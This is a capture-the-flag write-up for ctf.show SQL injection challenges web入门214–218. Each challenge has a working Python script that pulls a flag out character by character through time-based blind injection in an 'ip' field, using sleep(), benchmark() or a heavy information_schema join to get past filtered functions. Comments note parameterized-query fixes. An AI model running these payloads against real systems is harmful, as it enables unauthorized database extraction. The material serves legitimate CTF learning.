web入门214
#@another:uwvwko
import requests

# Time-based blind extraction script for the ctf.show challenge instance below.
# The only feedback channel is response latency: a correct character guess
# triggers sleep(3), anything else returns at once, and the 2 s threshold
# separates the two.  Defender's note: the 'ip' field is evidently spliced
# into a SQL statement server-side; binding it as a query parameter (or
# rejecting anything that is not an IP literal) closes the channel, and the
# burst of near-identical POSTs carrying sleep() stands out in request logs.
url = 'http://b0c11589-31c9-4bf9-8b66-6b5a1fc08726.challenge.ctf.show/api/index.php'
flag = ''
charset = '{-_1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM}'
# The author first enumerated table and column names with the same template.
payload = "select flaga from ctfshow_flagx"

for position in range(1, 50):
    for guess in charset:
        data = {
            'ip': f"if(substr(({payload}),{position},1)='{guess}',sleep(3),0)",
            'debug': '1',
        }
        response = requests.post(url, data=data)
        # A slow answer means the guessed character at this position is right.
        if response.elapsed.total_seconds() > 2:
            flag += guess
            print(flag)
            break

web入门215
#@uwvwko
import requests
import time

# Time-based blind extraction script: the injected value closes a single-quoted
# string ("1' or ... #") and uses sleep(3) as the oracle, judged against a 2 s
# threshold.  Defender's note: a parameterized query for the 'ip' field removes
# the injection point; the sequence of timed POSTs is also a clear log signature.
url = 'http://17ae312d-8d89-42f7-b881-b9068c90093b.challenge.ctf.show/api/'
flag = ''
charset = 'abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'

for position in range(1, 60):
    for guess in charset:
        # Table and column names were enumerated earlier with the same template.
        payload = {
            'ip': f"1' or if(substr((select group_concat(flagaa) from ctfshow_flagxc),{position},1)='{guess}',sleep(3),'False')#",
            'debug': 0,
        }
        response = requests.post(url, data=payload)
        if response.elapsed.total_seconds() > 2:
            flag += guess
            print(flag)
            break

(为啥有个A类)
web入门216

base64编码,但是我们可以直接用)来闭合
如:where id =from_base64(0)payload
脚本:
import requests

# Time-based blind extraction script.  Here the value sits inside a
# from_base64(...) call, so the injection closes it with ")" before the
# conditional sleep(3); the 2 s threshold decides hit or miss.  Defender's
# note: wrapping input in from_base64() is not a sanitizer -- the fix is still
# a bound parameter for the 'ip' field.
url = 'http://c5791659-334c-48d2-833a-1f0c9fa90735.challenge.ctf.show/api/'
charset = 'abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''

for position in range(1, 50):
    for guess in charset:
        # Database, table and column names were enumerated earlier with the same template.
        payload = {
            'debug': '0',
            'ip': f"1)or if(substr((select flagaac from ctfshow_flagxcc), {position}, 1) = '{guess}',sleep(3),0)#",
        }
        response = requests.post(url, data=payload)
        if response.elapsed.total_seconds() > 2:
            flag += guess
            print(flag)
            break

web入门217

sleep被禁了
看了下大佬的payload,我们可以使用 benchmark,
benchmark(count,expr),重复执行 count 次 expr 表达式,使得处理时间很长


时间大概是3秒,然后开始写脚本
import requests

# Time-based blind extraction script for a target where sleep() is filtered.
# benchmark(3000000, md5(...)) burns CPU instead, which the author measured at
# roughly 3 s; the 2 s threshold separates hit from miss.  Defender's note:
# blocklisting individual functions (sleep, benchmark, ...) does not remove the
# injection; only a parameterized query for the 'ip' field does, and CPU-heavy
# repeated requests are themselves a detectable anomaly.
url = 'http://4baeb3f2-07a1-438f-a1a6-6e984cf82339.challenge.ctf.show/api/'
charset = 'abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''

for position in range(1, 60):
    for guess in charset:
        # Database, table and column names were enumerated earlier with the same template.
        payload = {
            'debug': '1',
            'ip': f"if(substr((select flagaabc from ctfshow_flagxccb), {position}, 1) = '{guess}',benchmark(3000000,md5('12345')),0)",
        }
        response = requests.post(url, data=payload)
        if response.elapsed.total_seconds() > 2:
            flag += guess
            print(flag)
            break

web入门218

benchmark被禁了
脚本:
import requests

# Time-based blind extraction script for a target where both sleep() and
# benchmark() are filtered.  The delay comes from a self-join of
# information_schema.columns, which the page describes as a resource-consuming
# operation; the threshold is 0.4 s and the author warns the recovered flag may
# contain errors because the timing is noisy.  Defender's note: this is the
# third bypass on the same weakness -- a bound parameter for 'ip' would have
# ended the series, whereas function blocklists only change the payload.
url = 'http://04ce659f-5b93-475f-8526-203b887d0719.challenge.ctf.show/api/'
charset = 'abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''

for position in range(0, 60):
    for guess in charset:
        # Table and column names were enumerated earlier with the same template.
        payload = {
            'debug': '1',
            'ip': f"if(substr((select group_concat(flagaac) from ctfshow_flagxc),{position},1)='{guess}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')",
        }
        response = requests.post(url, data=payload)
        if response.elapsed.total_seconds() > 0.4:
            flag += guess
            print(flag)
            break
(SELECT count(*) FROM information_schema.columns A, information_schema.columns B)
是一个时间延迟或资源消耗的操作,至于判断用的时间阈值要根据自己的电脑进行调试,显示出来的flag有可能会有误差
